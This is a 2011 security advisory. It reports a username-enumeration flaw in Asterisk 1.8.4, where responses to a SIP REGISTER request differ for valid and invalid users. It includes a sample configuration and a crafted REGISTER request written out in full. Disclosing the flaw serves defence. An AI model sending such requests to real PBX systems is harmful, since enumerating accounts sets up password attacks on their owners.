`Asterisk, sip response permit username identification through use REGISTER
Author: francesco.tornieri \"At\" verona-wireless.net
Summary: Sip responses permit user identification
Release Date: 25/05/2011
Criticality level: Low
Impact: Information leak
Software: Asterisk 1.8.4 (I try it to an Asterisk 1.6.2.16.2 but it generates a timeout)
Description:
It's possible to enumerate valide sip username through use of REGISTER method (a similar problem has been fixed by Digium in 2009 and has been described in this document http://downloads.asterisk.org/pub/security/AST-2009-003.html).
Example:
PBX Asterisk:
----------
sip.conf
----------
[general]
context=outgoing
port=5060
bindaddr=192.168.2.1
realm=asterisk
allowguest=no
alwaysauthreject=yes <----
[template](!)
type=friend
canreinvite=no
host=dynamic
qualify=1000
disallow=all
allow=g729
[100](template)
callerid=phone100<100>
username=100
secret=password
[500](template)
callerid=phone200<500>
username=500
secret=password
------------------------
Craft Sip REGISTER example
------------------------
REGISTER sip:192.168.2.1 SIP/2.0
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:[email protected]>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:[email protected]>
Refer-To: sip:[email protected]
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
----------------
Method: REGISTER
----------------
Valid user (user 500)
Response:
---
Received: SIP/2.0 401 Unauthorized
---
Invalid user (user 501)
Response:
---
Received: SIP/2.0 100 Trying
---
Francesco Tornieri
`